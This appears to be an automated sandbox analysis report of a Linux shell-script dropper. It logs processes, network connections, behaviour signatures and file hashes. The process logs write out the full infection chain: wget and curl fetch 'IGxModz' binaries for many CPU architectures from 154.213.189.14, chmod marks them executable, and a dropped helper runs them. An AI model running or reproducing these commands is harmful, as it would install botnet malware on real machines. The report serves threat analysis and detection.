/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

debian9-mipsel-20240418-en

Max time kernel

28s

Max time network

29s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A

Processes

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f